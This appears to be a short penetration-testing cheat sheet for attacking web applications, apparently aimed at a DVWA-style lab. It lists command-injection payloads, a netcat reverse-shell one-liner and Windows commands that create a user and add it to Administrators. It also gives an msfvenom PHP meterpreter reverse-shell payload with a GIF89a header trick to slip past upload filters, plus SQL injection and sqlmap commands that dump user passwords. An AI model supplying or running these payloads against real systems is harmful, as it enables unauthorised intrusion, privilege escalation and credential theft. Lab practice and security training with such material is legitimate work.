Hacking Web Applications and Web Servers

Command Execution

Linux

  • 127.0.0.1 && ls

  • 127.0.0.1 & ls

  • 127.0.0.1 ; ls

  • 127.0.0.1 | ls - with space

  • 127.0.0.1 |ls - without space

  • 127.0.0.1 && nc -c sh 127.0.0.1 9001

Windows

  • hostname

  • whoami

  • tasklist

  • taskkill /PID 3112 /F - forcefully kills the process

  • dir c:\

  • net user

  • net user test /add - add a new user

  • net localgroup Administrators test /add - add test user to administrators

  • net user test - details of the user

  • dir c:\"pin.txt"

  • type c:\"pin.txt"


Brute-Forcing


File Upload

  • msfvenom -p php/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw > exploit.php

  • exploit.php.img

  • GIF89a; - add this line to any file to make it appear as an image file

  • use multi/handler


SQL Injection

Manual

  • 1' UNION SELECT user, password FROM users#

Sqlmap

  • sqlmap -r req.txt --batch

  • sqlmap -r req.txt --batch --level=5 --risk=3

  • sqlmap -r req.txt --batch --level=5 --risk=3 --current-db

  • sqlmap -r req.txt -D dvwa --tables

  • sqlmap -r req.txt -D dvwa -T users --columns

  • sqlmap -r req.txt -D dvwa -T users --dump
